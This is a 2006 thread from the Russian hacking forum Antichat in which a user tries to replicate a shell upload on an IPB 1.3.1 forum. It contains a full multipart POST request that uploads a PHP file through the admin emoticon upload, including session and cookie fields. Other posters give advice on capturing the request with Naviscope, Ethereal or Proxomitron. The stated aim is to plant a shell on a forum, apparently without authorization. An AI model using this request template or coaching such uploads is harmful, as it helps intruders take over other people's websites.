ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Naviscope перехват пакета
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Naviscope перехват пакета
  #1  
Старый 14.06.2006, 06:35
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию Naviscope перехват пакета
Здесь есть хорошая статья как залить шелл на форум
http://antichat.ru/txt/IPB/index2.php
Там также дается пример перехваченного пакета
Код:
POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798; 

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="c:/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--
но у меня переватывается только
Код:
GET http://www.site.ru/forum/admin.php?adsess=adb5bdf51ef7561657e41a0587585012&act=op&code=emo HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.site.ru/forum/admin.php?adsess=adb5bef51ef7563657e41a0587585012
Accept-Language: en-us
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: www.site.ru
Cookie: cnstid=12519652; member_name=user; member_password=as694a33b5945691629dee124b813e33; member_newpm=0; member_id=1; pass_hash=as694a33b5945691629dee124b813e33; member_newpm=0; PHPSESSID=adabe49374adf90a5687a8203c24e50b
можно ли какнибудь также перехватить или где можна найти вот эту часть
Код:
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="c:/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--
IPB v1.3.1
Зарание спасибо
 
Ответить с цитированием

  #2  
Старый 14.06.2006, 07:28
Ээх
Новичок
Регистрация: 26.05.2006
Сообщений: 3
Провел на форуме:
51872

Репутация: 0
По умолчанию
Если надо только перехватить пакет - поставь Ethereal или Proxomitron. Хотя скорее всего Навископ перехватывает то, что есть. Просто форум другого "типа".
 
Ответить с цитированием

  #3  
Старый 14.06.2006, 07:43
hidden
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054

Репутация: 1292


По умолчанию
Это всё что твой браузер послал, еслиб он посылал что-то кроме заголовка, он бы также послал его длину, как в первом варианте.
Цитата:
Content-Length: 677
Так что перехватываешь ты, не то.
 
Ответить с цитированием

  #4  
Старый 14.06.2006, 08:12
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
Код:
Перехватываю не то
Я открываю страницу Manege Emotions c browse кнопкой в низу и смотрю что naviscope показал.
 
Ответить с цитированием

  #5  
Старый 14.06.2006, 10:28
Ээх
Новичок
Регистрация: 26.05.2006
Сообщений: 3
Провел на форуме:
51872

Репутация: 0
По умолчанию
Вполне нормальный ответ на запрос Get. В твоем же примере стоял Post. ИМХО - ты зашел не на такой форум, как в твоем примере.
 
Ответить с цитированием

  #6  
Старый 14.06.2006, 10:58
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию
Помоему стоит лучше перехватить запрос на загрузку файла =)
 
Ответить с цитированием

  #7  
Старый 14.06.2006, 11:33
Ээх
Новичок
Регистрация: 26.05.2006
Сообщений: 3
Провел на форуме:
51872

Репутация: 0
По умолчанию
ИМХО, ты просто зашел не на такой форум, как в твоем примере. В примере запрос Post, а в твоем случае - Get. А Get`ом много не передашь.
Навископ просто делает свое дело, довит то, что есть.
 
Ответить с цитированием

  #8  
Старый 14.06.2006, 18:50
hidden
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054

Репутация: 1292


По умолчанию
Цитата:
Сообщение от Ээх  
ИМХО, ты просто зашел не на такой форум, как в твоем примере. В примере запрос Post, а в твоем случае - Get. А Get`ом много не передашь.
Навископ просто делает свое дело, довит то, что есть.
Не на одном форуме файлы GETом не передают, так-что ты передаёшь не ту инфу.

[offtop]Представляю, как-бы, хотя-бы 100кб-ная картинка через GET передавалась бы, хотя если её забэйсить и передовать уже 150кб текста [/offtop]
 
Ответить с цитированием

  #9  
Старый 14.06.2006, 22:20
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
я пробовал валовить пакет в процессе upload, но ниче не вылавливеатся кроме
Код:
HTTP/1.0 200 OK
Date: Wed, 14 Jun 2006 18:16:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.4
Connection: close
Content-Type: text/html
 
Ответить с цитированием

  #10  
Старый 14.06.2006, 22:25
hidden
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054

Репутация: 1292


По умолчанию
А это ты выловил то, что вернул тебе сервер.
Попробуй [это] для отлавливания пакетов пароль antichat.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Перехват Gsm пакетов SNIFF Сотовый фрикинг 16 27.12.2009 22:25
Найден первый макровирус для пакета StarOffice dinar_007 Мировые новости 1 01.06.2006 18:01
Атака на VoIP: перехват novichok Аппаратное обеспечение 0 24.04.2006 15:30
Клоны Naviscope SURRENDER Болталка 6 20.04.2005 21:25
Перехват cookie php скриптом Майор PHP, PERL, MySQL, JavaScript 10 01.04.2005 18:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ